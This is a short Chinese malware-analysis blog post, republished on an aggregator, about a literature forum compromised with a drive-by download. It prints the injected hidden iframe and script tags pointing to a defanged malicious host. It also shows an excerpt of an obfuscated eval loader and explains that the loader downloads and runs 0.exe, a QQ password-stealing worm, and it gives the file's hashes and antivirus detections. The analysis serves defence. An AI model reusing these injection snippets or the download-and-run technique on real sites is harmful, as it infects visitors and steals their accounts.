文学论坛挂的马变为 Worm.Win32.QQPass.a / 0.exe
来源:互联网 发布:java权限管理实现原理 编辑:程序博客网 时间:2024/05/01 09:08
文学论坛挂的马变为 Worm.Win32.QQPass.a / 0.exe
endurer 原创
2007-08-31 第1版
检查发现网页中包含代码:
/---
<iframe src="hxxp://www.y*oyo*5*9***.com/m**6*8.htm?id=907" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://www.y*oyo*5*9***.com/m**6*8.htm?id=907 包含代码:
/---
<script src=hxxp://www.y*oyo*5*9***.com/00.js></script>
1
2
3
<script src=hxxp://www.y*oyo*5*9***.com/11.js></script>
---/
00.js 内容为:
/---
eval("/146/165…(略)…/40/175")
---/
解密后的代码功能为 下载 hxxp://www.*down*8**9.com/0.exe,保存到 %windir%,文件名由自定义函数:
/---
function gn(tnV1) { var kUzRo2 = window["Math"]["random"]()*tnV1; return '.tmp'+'~tmp'; }
---/
生成,即~tmp.tmp,然后用 cmd.exe /c 来运行。
文件说明符 : d:/test/0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-8-31 19:3:13
修改时间 : 2007-8-31 19:3:22
访问时间 : 2007-8-31 0:0:0
大小 : 16944 字节 16.560 KB
MD5 : ceb6f4d04c9f5ff2f6636dd7233460d9
HSA1: 9F48898ECA47463712D65752C4AF0C072F200C8F
Kaspersky 报为 Worm.Win32.QQPass.a,瑞星 报为 Trojan.PSW.Win32.Agent.vcd
11.js 没有什么可疑的东东。
- 文学论坛挂的马变为 Worm.Win32.QQPass.a / 0.exe
- 文学论坛挂的马 Worm.Win32.QQPass.a 的简单分析
- 文学论坛挂的马 Worm.Win32.Agent.imh 的简单分析
- 文学论坛挂的马换 成 Worm.Win32.Agent.imh 了
- 某文学论坛被挂马 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt
- 某论坛挂马Worm.Win32.Autorun.eyh
- 一个传播 Worm.Win32.Otwycal.c / Worm.Win32.Infei.a 的网站v2
- 某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
- 某原产地保护信息网被挂马Worm.Win32.QQPass.at等
- 遭遇Worm.UsbSpy.a/Worm.Win32.Delf.aj
- 遭遇通过U盘传播的蠕虫Worm.Win32.Agent.aj/setup.exe等
- 遭遇使用映像劫持/IFEO 的 Worm.Win32.Avkiller.i/gavuusg.exe
- 遭遇使用映像劫持/IFEO 的 Worm.Win32.Avkiller.i/gavuusg.exe /v2
- 小心QQ上传播的 1407.rar / 我的照片.Exe /Trojan-PSW.Win32.Delf.agh/Worm.Win32.PaBug.cn
- 抓到通过U盘传播的 Virus.Win32.AutoRun.ab/Worm.Win32.Agent.zhw/setup.exe
- 某县农业信息网挂马 Worm.Win32.AutoRun.umf
- 某文学网站挂马logo.jpg/logo.exe
- 利用迅雷和MS06014漏洞传播Worm.Win32.Agent.a的电子书网站
- 想在游戏中挣钱的必读!《征途》的工资系统分析!
- 批处理文件指南
- 沂蒙颂
- overlib.js
- j2EE开发工具下载地址..
- 文学论坛挂的马变为 Worm.Win32.QQPass.a / 0.exe
- 等待在八月中持续
- Spring AOP权限管理
- Symbian编程VC6开发环境设置——网上资料加个人经验篇
- C++为cin关闭行输入模式
- grep学习笔记
- 看到STL的好处等于不懂STL
- 警惕数据库中不可见的制表符
- 庆祝blog新开通